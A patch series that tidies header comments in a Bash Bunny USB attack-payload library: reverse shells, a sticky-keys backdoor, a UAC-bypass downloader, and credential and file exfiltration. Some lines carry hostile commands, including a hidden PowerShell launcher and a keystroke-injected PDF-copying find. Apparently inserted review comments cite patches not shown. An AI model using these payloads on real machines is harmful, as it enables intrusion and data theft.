From 1e1e9cfcb1c753b841ad64028ac0241ee7bc00b6 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:02:57 +0100 Subject: [PATCH 01/22] Cleanup: RAZ_VBScript: Update Payload Header --- .../library/execution/RAZ_VBScript/payload.txt | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/RAZ_VBScript/payload.txt b/payloads/library/execution/RAZ_VBScript/payload.txt index 1383e370..ba13b4fc 100644 --- a/payloads/library/execution/RAZ_VBScript/payload.txt +++ b/payloads/library/execution/RAZ_VBScript/payload.txt @@ -4,17 +4,15 @@ # Author: RalphyZ # Version: 1.1a # Target: Windows 7+ -# Dependencies: VBScript (a.vbs) in the switch folder with this file +# Dependencies: Included a.vbs script # # Description: Executes a VBScript, concealed in a hidden PowerShell window # -# Colors: -# | Status | Color | Description | -# | ---------- | ------------------------------| ------------------------------------------------ | -# | SETUP | Magenta solid | Setting attack mode, getting the switch position | -# | FAIL | Red slow blink | Could not find the a.vbs script | -# | ATTACK | Yellow single blink | Running the VBScript | -# | FINISH | Green blink followed by SOLID | Script is finished | +# LEDS: +# Magenta: Setting attack mode, getting the switch position +# Red Blink: Could not find the a.vbs script +# Yellow Single Blink: Running the VBScript +# Green Blink to Solid: Script is finished # Magenta solid LED SETUP @@ -43,4 +41,4 @@ QUACK ENTER # Green 1000ms VERYFAST blink followed by SOLID LED FINISH -exit 0 \ No newline at end of file +exit 0 From 759b114db909c844c5cfc9344ca53d265e08e369 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:05:28 +0100 Subject: [PATCH 02/22] Cleanup: RevShellBack: Update Payload Header --- payloads/library/execution/RevShellBack/payload.txt | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) 
diff --git a/payloads/library/execution/RevShellBack/payload.txt b/payloads/library/execution/RevShellBack/payload.txt index 674c71e0..2292346f 100644 --- a/payloads/library/execution/RevShellBack/payload.txt +++ b/payloads/library/execution/RevShellBack/payload.txt @@ -1,12 +1,19 @@ #!/bin/bash # # Title: RevShellBack -# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet. # Author: NodePoint # Version: 0.1.3 # Category: Execution # Target: Windows -# Attackmodes: Ethernet, HID +# Attack Modes: RNDIS_ETHERNET, HID +# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet. +# +# LEDS: +# Magenta: Setup +# Yellow Single Blink: Open CMD +# Yellow Double Blink: Start Reverse Shell +# Cyan Blink: Attack +# Green: Finished # Set attack mode LED SETUP From 37de2446e36fd75050ff1df71b4df100d4b59049 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:07:06 +0100 Subject: [PATCH 03/22] Cleanup: ShellExec: Update Payload Header --- .../library/execution/ShellExec/payload.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/ShellExec/payload.txt b/payloads/library/execution/ShellExec/payload.txt index 500f2f93..07470f95 100644 --- a/payloads/library/execution/ShellExec/payload.txt +++ b/payloads/library/execution/ShellExec/payload.txt 
@@ -2,17 +2,17 @@ # Title: ShellExec # Author: audibleblink -# Target: Mac/Linux +# Target: Mac, Linux # Version: 1.1 +# Attack Modes: ECM_ETHERNET, HID +# Description: Create a web server on the BashBunny and force the victim to download and execute a script. +# Perfect for when mass storage isn't an option. # -# Create a web server on the BashBunny and force -# the victim to download and execute a script. -# Perfect for when mass storage isn't an option. -# -# White | Ready -# Ammber blinking | Waiting for server -# Blue blinking | Attacking -# Green | Finished +# LEDS: +# White: Ready +# Amber Blink: Waiting for server +# Blue Blink: Attacking +# Green: Finished LED SETUP ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E From 17ef1c009951b64501f29277109f1385cf395951 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:08:50 +0100 Subject: [PATCH 04/22] Cleanup: StickyBunny: Update Payload Header --- .../library/execution/StickyBunny/payload.txt | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/StickyBunny/payload.txt b/payloads/library/execution/StickyBunny/payload.txt index 8ea53f50..76abf693 100644 --- a/payloads/library/execution/StickyBunny/payload.txt +++ b/payloads/library/execution/StickyBunny/payload.txt @@ -1,15 +1,17 @@ #!/bin/bash # -# Title: StickyBunny -# Author: Squibs -# Version: 0.3 -# Plug2Pwn: 18s +# Title: StickyBunny +# Author: Squibs +# Version: 0.3 +# Attack Modes: HID +# Target: Windows +# Runtime: 18s +# Description: Creates the sticky keys back door on a windows machine # -# Creates the sticky keys back door on a windows machine -# -# Blue...............Preparing Attack -# Yellow.............Attacking -# Green..............GTFO +# LEDS: +# Blue: Preparing Attack +# Yellow: Attacking +# Green: Finished #Open Admin Powershell ATTACKMODE HID From 5e1dbdb4895d192f1b54121ecaea7337bd4882be Mon Sep 17 00:00:00 2001 
From: Marc Date: Fri, 5 Jul 2019 08:12:17 +0100 Subject: [PATCH 05/22] Cleanup: exe_UACBypassD&E: Update Payload Header --- .../execution/exe_UACBypassD&E/payload.txt | 23 +++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/payloads/library/execution/exe_UACBypassD&E/payload.txt b/payloads/library/execution/exe_UACBypassD&E/payload.txt index a37dc4a8..1d7fcc98 100644 --- a/payloads/library/execution/exe_UACBypassD&E/payload.txt +++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt 
@@ -1,14 +1,24 @@ -# Title: UACBypass -# Author: Skiddie -# Version: 1.1 -# Target: Windows +# Title: UACBypass +# Author: Skiddie +# Version: 1.1 +# Target: Windows +# Attack Modes: HID, STORAGE # -# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass) +# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting +# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME +# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. +# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. +# However from what I am aware version 7,8 and 8.1 are still effected. +# Currently fastest download and execute for HID attacks to date. (with UAC bypass) +# +# LEDS: +# Magenta: Starting +# Green: Finished #Define your bunny storage stick name DRIVER_LABEL='BashBunny' -#RED means starting +#Magenta means starting LED SETUP #Gets File locations @@ -17,7 +27,6 @@ GET SWITCH_POSITION #We are a keyboard ATTACKMODE HID STORAGE - QUACK DELAY 500 RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')" QUACK DELAY 1000 From a764a9e2388cfd176f88e0502fdbe8c2903f9508 Mon Sep 17 00:00:00 2001 
From: Marc Date: Fri, 5 Jul 2019 08:14:54 +0100 Subject: [PATCH 06/22] Cleanup: psh_DownloadExec: Update Payload Header --- .../execution/psh_DownloadExec/payload.txt | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/psh_DownloadExec/payload.txt b/payloads/library/execution/psh_DownloadExec/payload.txt index bddd3cdf..479635ad 100644 --- a/payloads/library/execution/psh_DownloadExec/payload.txt +++ b/payloads/library/execution/psh_DownloadExec/payload.txt @@ -4,18 +4,17 @@ # Author: LowValueTarget # Version: 1.2 # Category: Powershell -# Target: Windows XP SP3+ (Powershell) +# Target: Windows XP SP3+ # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.3 +# Description: Quick HID attack to retrieve and run powershell payload from BashBunny web server. +# Ensure p.txt (your powershell payload) exists in payload directory # -# Quick HID attack to retrieve and run powershell payload from BashBunny web server -# ensure p.txt (your powershell payload) exists in payload directory -# -# | Attack Stage | Description | -# | ------------------- | ---------------------------------------- | -# | Stage 1 | Running Initial Powershell Commands | -# | Stage 2 | Delivering powershell payload | -# +# LEDS: +# Yellow Single Blink: Running Initial Powershell Commands +# Yellow Double Blink: Delivering powershell payload +# Green: Finished +# Red Blink: Failure ATTACKMODE RNDIS_ETHERNET HID LED SETUP From 377a5bc7b4d69f46c48ab69477611b846012ea3a Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:17:50 +0100 Subject: [PATCH 07/22] Cleanup: psh_DownloadExecSMB: Update Payload Header Also Fix left over merge errors.. --- .../execution/psh_DownloadExecSMB/payload.txt | 30 ++++++++----------- 1 file changed, 13 insertions(+), 17 deletions(-) diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt index 8d127475..bc0eb902 100644 
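Review bot: The new LEDS block omits the setup state even though the context right after the header runs `LED SETUP`, and the field is still spelled `# Attackmodes:` while the other payloads in this series use `# Attack Modes:`. I would add `# Magenta: Setup` as the first LEDS entry and rename the field to `# Attack Modes: HID, RNDIS_ETHERNET`. The `Green: Finished` and `Red Blink: Failure` entries refer to code outside the hunk, so they could not be checked here.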
--- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt @@ -4,26 +4,22 @@ # Author: LowValueTarget # Version: 2.0 # Category: Powershell -# Target: Windows XP SP3+ (Powershell) -# Attackmodes: HID, RNDIS_ETHERNET +# Target: Windows XP SP3+ +# Attack Modes: HID, RNDIS_ETHERNET # Firmware: >= 1.2 +# Required Tools: impacket +# Description: Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. +# Possibilities are limitless! Credentials captured by are stored as loot. +# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) # -# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless! -# Credentials captured by are stored as loot. -# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) -# -# Required tools: impacket -======= -# Credentials captured by are stored as loot. -# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) -# -# Required tools: impacket -# -# | Attack Stage | Description | -# | ------------------- | ------------------------------| -# | Stage 1 | Powershell | -# | Stage 2 | Delivering powershell payload | +# LEDS: +# Magenta: Setup +# Yellow Single Blink: Powershell +# Yellow Double Blink: Delivering powershell payload +# White: Clean up +# Green: Finished # + ATTACKMODE RNDIS_ETHERNET HID # SETUP From 6295445794b612f5dad2645476b43dcfa81f7858 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:21:31 +0100 Subject: [PATCH 08/22] Cleanup: BlackBackup: Update Payload Header Also move shebang to top of file. --- .../exfiltration/BlackBackup/payload.txt | 23 ++++++++++--------- 1 file changed, 12 insertions(+), 11 deletions(-) 
diff --git a/payloads/library/exfiltration/BlackBackup/payload.txt b/payloads/library/exfiltration/BlackBackup/payload.txt index 640b687d..eabefdfc 100644 --- a/payloads/library/exfiltration/BlackBackup/payload.txt +++ b/payloads/library/exfiltration/BlackBackup/payload.txt @@ -1,16 +1,17 @@ -# Title: BlackBackup -# Author: JWHeuver & JBaselier -# Version: 1.0 -# -# Runs powershell script to get Wlan and logon credentials -# from computer and save them on USB drive (Storage attack) -# -# Purple.............Loading -# Green .............Execute Credential Ripper Powershell -# Off................Finished -# #!/bin/bash +# Title: BlackBackup +# Author: JWHeuver & JBaselier +# Version: 1.0 +# Description: Runs powershell script to get Wlan and logon credentials +# from computer and save them on USB drive (Storage attack) +# +# LEDS: +# Purple: Loading +# Green: Execute Credential Ripper Powershell +# Off: Finished +# + # OPTIONS - More options available in the Powershell payload OBFUSCATECMD="N" # Y=yes or N=no From d92eef0e32c329a86368b5ef9174f25073818941 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:24:15 +0100 Subject: [PATCH 09/22] Cleanup: browserData: Update Payload Header --- .../exfiltration/browserData/payload.txt | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/browserData/payload.txt b/payloads/library/exfiltration/browserData/payload.txt index 9f60c3ef..29424ac6 100755 --- a/payloads/library/exfiltration/browserData/payload.txt +++ b/payloads/library/exfiltration/browserData/payload.txt 
@@ -2,16 +2,17 @@ # # Title: BrowserData # Author: zachstanford -# Version: 0.1 (Tested on Windows 10) +# Version: 0.1 +# Targets: Windows +# Attack Modes: HID, STORAGE +# Description: Dumps browser info like history and bookmarks from powershell script +# then saves them in /root/udisk/loot/BrowserData/%ComputerName% +# Credits to this Empire's powershell script: +# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1 # -# Dumps browser info like history and bookmarks from powershell script -# then saves them in /root/udisk/loot/BrowserData/%ComputerName% -# Credits to this Empire's powershell script: -# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1 - -#script -# Blue...............Running Script -# Purple.............Finished +# LEDS: +# Blue: Running Script +# Magenta: Finished # Not sure if this is the right variable. Feel free to change it. @@ -23,7 +24,6 @@ LED R SLOW LOOTDIR=/root/udisk/loot/BrowserData mkdir -p $LOOTDIR - LED B SLOW # wait 6 seconds for the storage to popup From f451511363a9802bc852609ff3df1780966da684 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:28:18 +0100 Subject: [PATCH 10/22] Cleanup: dropbox-exfiltrator: Update Payload Header --- .../exfiltration/dropbox-exfiltrator/payload.txt | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt index 033e3f8b..fc36f243 100644 --- a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt +++ b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt 
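Review bot: The rewritten LEDS block lists only Blue and Magenta, but the context in the second hunk sets `LED R SLOW` before creating the loot directory and only then `LED B SLOW`. The red blink is therefore the first state an operator sees, and it is undocumented. I would add `# Red Blink: Setup` ahead of the blue entry and write that entry as `# Blue Blink: Running Script`. Whether the finish state is really magenta cannot be confirmed from the visible lines.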
@@ -1,9 +1,14 @@ -# Dropbox Exfiltrator +# Title: Dropbox Exfiltrator # Author: Hak5Darren -# Props: jimcola99 Buchanan -# Demo: Hak5 episode 2505 -# Target: Windows Vista+ -# Category: Exfiltration +# Props: jimcola99 Buchanan +# Demo: Hak5 Episode 2505 +# Targets: Windows +# Description: Exfiltrate via DropBox +# +# LEDS: +# Magenta: Setup +# Yellow Blink: Getting Script +# Green: Finish LED SETUP ATTACKMODE HID From 5b146829365adf9060a7c9e1aec535a520f65960 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:28:52 +0100 Subject: [PATCH 11/22] Cleanup: dropbox-exfiltrator: Update Payload Header --- payloads/library/exfiltration/dropbox-exfiltrator/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt index fc36f243..bbce1a1c 100644 --- a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt +++ b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt @@ -1,6 +1,6 @@ # Title: Dropbox Exfiltrator # Author: Hak5Darren -# Props: jimcola99 Buchanan +# Props: jimcola99, Buchanan # Demo: Hak5 Episode 2505 # Targets: Windows # Description: Exfiltrate via DropBox From 937ecc7e8bff56a2e8b47fcb74f60a1fa551557e Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:31:49 +0100 Subject: [PATCH 12/22] Cleanup: FileInfoExfil: Update Payload Header --- .../exfiltration/FileInfoExfil/payload.txt | 40 ++++++++----------- 1 file changed, 16 insertions(+), 24 deletions(-) diff --git a/payloads/library/exfiltration/FileInfoExfil/payload.txt b/payloads/library/exfiltration/FileInfoExfil/payload.txt index b0854cf4..5652be57 100644 --- a/payloads/library/exfiltration/FileInfoExfil/payload.txt +++ b/payloads/library/exfiltration/FileInfoExfil/payload.txt 
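Review bot: The `Targets:` line drops the minimum OS version: `Windows Vista+` becomes `Windows` here, and in the smb_exfiltrator and usb_exfiltrator patches `Windows XP SP3+` becomes `Windows XP`, which now reads as a single supported release rather than a floor. The `(Powershell)` qualifier removed in smb_exfiltrator was also the only hint in that header that the target needs PowerShell. I would keep the floor, e.g. `# Targets: Windows Vista+` here and `# Target: Windows XP SP3+` in the other two. This header also lacks the `# Attack Modes:` line that the rest of the series adds, although `ATTACKMODE HID` is visible just below it.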
@@ -1,18 +1,21 @@ -#Title: FileInfoExfiltrator -#Author: A_SarcasticGuy -#Version: 1.0 -#Target: Windows +#!/bin/bash + +# Title: FileInfoExfiltrator +# Author: A_SarcasticGuy +# Version: 1.0 +# Attack Modes: HID, STORAGE +# Targets: Windows +# Description: Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) +# for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") +# to then be outputted to a text file in the loot directory, in a subfolder with the name of the +# system and with a file name of the date and time of the scan. +# NOTE: p.ps1 MUST be in loot/payloads/ for this to work. # -#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan. +# LEDS +# Magenta: Script Started +# Yellow: Ducky Script Started +# Red: Failed to run Ducky Script, see log file # -# Options: Search Directory: Find in p.bat (default c:/) -# Search criteria: Find in p.bat (default "pass*") -# -# Purple LED..................Script Started -# Yellow LED..................Ducky Script Started -# Red LED.....................Failed to run Ducky Script, see log file -# -# NOTE: p.ps1 MUST be in loot/payloads/ for this to work. # LED SETUP @@ -23,29 +26,18 @@ ATTACKMODE HID STORAGE if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then - #Call ducky script LED STAGE1 - QUACK ${SWITCH_POSITION}/ducky_script.txt - - QUACK DELAY 10000 - LED FINISH else - LED FAIL - - #Red LED if unable to load script echo "Unable to load ducky_script.txt" >> /root/debuglog.txt - exit 1 - - fi From b2731e7e97154e4df8428c90cdd971031ae09599 Mon Sep 17 00:00:00 2001 
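Review bot: The LEDS block in the new header has no entry for the success path, although the second hunk shows the happy path ending with `LED FINISH`; it is also written `# LEDS` without the colon used elsewhere. I would add `# Green: Finished` and restore `# LEDS:`. The re-wrapped description still carries a stray comment marker from the old line wrap in `beginning with a #specific phrase`, which should read `a specific phrase`. The removed Options lines were the only pointer to where the search directory and pattern are configured, so a one-line replacement naming that file would help. The old text said `p.bat` while the NOTE names `p.ps1`, so please confirm which is right.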
From: Marc Date: Fri, 5 Jul 2019 08:33:46 +0100 Subject: [PATCH 13/22] Cleanup: ftp_exfiltrator: Update Payload Header --- .../exfiltration/ftp_exfiltrator/payload.txt | 24 +++++++++---------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt index f2bc2b59..6d3b1cbb 100644 --- a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt @@ -1,19 +1,17 @@ #!/bin/bash # -# Title: FTP Exfiltrator -# Author: Nutt -# Version: 1.0 -# Target: Windows +# Title: FTP Exfiltrator +# Author: Nutt +# Version: 1.0 +# Targets: Windows +# Description: Exfiltrates files from the users Documents folder FTP's all files/folders to a specified +# FTP site named by the victim hostname. Powershell FTP script will stay running after +# BashBunny is unpluggedonce light turns green unplug and check FTP site. # -#Exfiltrates files from the users Documents folder -#FTP's all files/folders to a specified FTP site named by the victim hostname. -#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. - -#Executes 1.ps1 - -#Purple.........Setup -#Red............Failed - Need to work on -#Green..........Finished +# LEDS: +# Purple: Setup +# Red: Failed - Need to work on +# Green: Finished LED SETUP GET SWITCH_POSITION From 83e57026399e68ad80506b3d099248bb95557834 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:35:47 +0100 Subject: [PATCH 14/22] Cleanup: MacPDFExfil: Update Payload Header --- payloads/library/exfiltration/MacPDFExfil/payload.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/MacPDFExfil/payload.txt b/payloads/library/exfiltration/MacPDFExfil/payload.txt index d74275db..30f135ba 100644 --- a/payloads/library/exfiltration/MacPDFExfil/payload.txt 
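Review bot: The re-wrapped description loses the punctuation between two sentences and now reads `BashBunny is unpluggedonce light turns green`; the first line has the same run-on in `Documents folder FTP's all files/folders`. I would write `# BashBunny is unplugged. Once the light turns green, unplug and check the FTP site.` and put a period after `Documents folder`. The removed `#Executes 1.ps1` line was the only mention of the script that does the work, and the header has no `# Attack Modes:` field like the others in this series.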
+++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt @@ -4,9 +4,9 @@ # Author: k1ul3ss # Props: audibleblink # Version: 1.0 -# Category: Exfiltration -# Target: macOS -# Attackmodes: HID, Storage +# Targets: macOS +# Attack Modes: HID, Storage +# Description: Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage. ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E @@ -28,4 +28,4 @@ QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Ter QUACK ENTER # sync the filesystem -sync \ No newline at end of file +sync From f214a3adf9ac1982b05d9062775e69a64ad0c079 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:39:26 +0100 Subject: [PATCH 15/22] Cleanup: optical-exfiltration: Update Payload Header --- .../optical-exfiltration/payload.txt | 43 ++++++++----------- 1 file changed, 17 insertions(+), 26 deletions(-) diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/optical-exfiltration/payload.txt index 6f70b5df..99f33306 100755 --- a/payloads/library/exfiltration/optical-exfiltration/payload.txt +++ b/payloads/library/exfiltration/optical-exfiltration/payload.txt 
@@ -1,31 +1,22 @@ #!/bin/bash # -# Title: Optical Exfiltration -# Author: bg-wa -# Version: 1.0 -# Category: HID -# Target: *NIX -# Attackmodes: HID -# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor +# Title: Optical Exfiltration +# Author: bg-wa +# Version: 1.0 +# Targets: macOS, Linux +# Attack Modes: HID +# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor +# Description: Quick HID only attack to write an HTML/JS file to target machine +# and open a browser, to exfiltrate data Using QR Codes and a video recording device. +# Optional html params: +# base64: Passing a base64 string to this param will auto-start processing QR Codes. +# playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering. +# Example: Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" # -# Quick HID only attack to write an HTML/JS file to target machine -# and open a browser, to exfiltrate data Using QR Codes and a video -# recording device. -# -# Optional html params: -# base64: Passing a base64 string to this param will auto-start processing QR Codes. -# -# playback: Passing the string "finish" to this param will auto-play the results, -# when QR codes finish rendering. -# -# Example: -# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" -# -# | Attack Stage | Description | -# | ------------------- | ---------------------------------------- | -# | SETUP | Open vi | -# | ATTACK | Writing HTML | -# | FINISH | Browser Ready/Processing | +# LEDS: +# Magenta: Open vi +# Yellow Blink: Writing HTML +# Green: Browser Ready/Processing # ATTACKMODE HID @@ -65,4 +56,4 @@ Q ENTER Q STRING firefox "$target_html" Q ENTER -LED FINISH \ No newline at end of file +LED FINISH From 4ecfbf665e4656a7938db587898293ddd35f8171 Mon Sep 17 00:00:00 2001 
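Review bot: The example in the new header still points at `Ln65`, but this commit shortens the header by nine lines, and the second hunk (`@@ -65,4 +56,4 @@`) shows the `Q STRING firefox "$target_html"` statement now sitting at about line 57. I would drop the line number and refer to the statement itself, e.g. `# Example: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" (replaces the final Q STRING firefox line)`. A line-number reference in a header comment will go stale again the next time the header is edited.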
From: Marc Date: Fri, 5 Jul 2019 08:41:35 +0100 Subject: [PATCH 16/22] Cleanup: Powershell_TCP_Extractor: Update Payload Header --- .../exfiltration/Powershell_TCP_Extractor/payload.txt | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt index b5553363..2a27d33b 100644 --- a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt +++ b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt @@ -3,10 +3,15 @@ # Title: Powershell Extractor # Author: $irLurk$alot # Version: 1.0 -# Target: Windows +# Targets: Windows +# Attack Modes: HID, STORAGE +# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn runs powershell script to copy move and extract data. # -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn runs powershell script to copy move and extract data. +# LEDS: +# Magenta: Setting Up +# Yellow Blink: Executing Powershell +# Green: Finished LED SETUP From 1839f3e760240c1df689a30dee5dcc37e85186ac Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:26:38 +0100 Subject: [PATCH 17/22] Cleanup: simple-usb-extractor: Add Payload Header --- .../exfiltration/simple-usb-extractor/payload.txt | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/simple-usb-extractor/payload.txt b/payloads/library/exfiltration/simple-usb-extractor/payload.txt index d3d434be..8f8de431 100644 --- a/payloads/library/exfiltration/simple-usb-extractor/payload.txt +++ b/payloads/library/exfiltration/simple-usb-extractor/payload.txt 
@@ -1,4 +1,16 @@ -# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs +#!/bin/bash +# +# Title: simple-usb-extractor +# Version: 1.0 +# Author: danthegoodman1 +# Targets: Windows +# Attack Modes: HID, STORAGE +# Description: Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs +# +# LEDS: +# Yellow Blink - Attacking +# Green - Finished + GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE From 3b368fe23e433c1854a26535455cd823b85a62fb Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:28:25 +0100 Subject: [PATCH 18/22] Cleanup: SmacAndGrab: Update Payload Header --- payloads/library/exfiltration/SmacAndGrab/payload.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/payloads/library/exfiltration/SmacAndGrab/payload.txt b/payloads/library/exfiltration/SmacAndGrab/payload.txt index a78f1fc5..f33ccb1d 100644 --- a/payloads/library/exfiltration/SmacAndGrab/payload.txt +++ b/payloads/library/exfiltration/SmacAndGrab/payload.txt @@ -2,13 +2,14 @@ # # Title: sMacAndGrab # Author: audibleblink -# Target: macOS +# Targets: macOS # Version: 1.2 +# Attack Modes: STORAGE, HID +# Description: Backup a list of files from macOS # -# Backup a list of files from macOS -# -# Yellow (blinking)...Attacking -# Green...............Finished +# LEDS: +# Yellow Blink: Attacking +# Green: Finished LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E From 20ca26ee74db3d11fbde7e98501febc1caaba4e7 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:31:53 +0100 Subject: [PATCH 19/22] Cleanup: SmartFileExtract: Update Payload Header --- .../SmartFileExtract_Exfiltrator/payload.txt | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt index 613546a8..8c5d9d09 100644 
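Review bot: The LEDS entries in this new header use ` - ` as the separator (`# Yellow Blink - Attacking`) while every other header touched in the series uses a colon; the TwoStageMac patch at the end of the series has the same inconsistency. I would write `# Yellow Blink: Attacking` and `# Green: Finished`. The field order (`Version` before `Author`) also differs from the other headers, which would only matter if these headers are ever read by a script rather than a person.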
--- a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt @@ -1,16 +1,18 @@ #!/bin/bash # -# Title: ExecutableInstaller -# Author: IMcPwn (original) -# Additions: SaintCrossbow (only for the parts to run SFE) -# Version: 1.0 -# Target: Windows 7+ -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn copies payload.exe from the root of the Bash Bunny and then executes it -# using the --startup parameter. Change these settings inside of e.cmd. +# Title: SmartFileExtract +# Author: IMcPwn +# Props: SaintCrossbow +# Version: 1.0 +# Targets: Windows +# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies payload.exe from the root of the Bash Bunny and then executes it +# using the --startup parameter. Change these settings inside of e.cmd. # +# LEDS: +# Red: Attacking +# Green: Finished # Source bunny_helpers.sh to get environment variable SWITCH_POSITION source bunny_helpers.sh From e3c4e45e29d5e044444783d59663a259132bd2f4 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:35:15 +0100 Subject: [PATCH 20/22] Cleanup: smb_exfiltrator: Update Payload Header 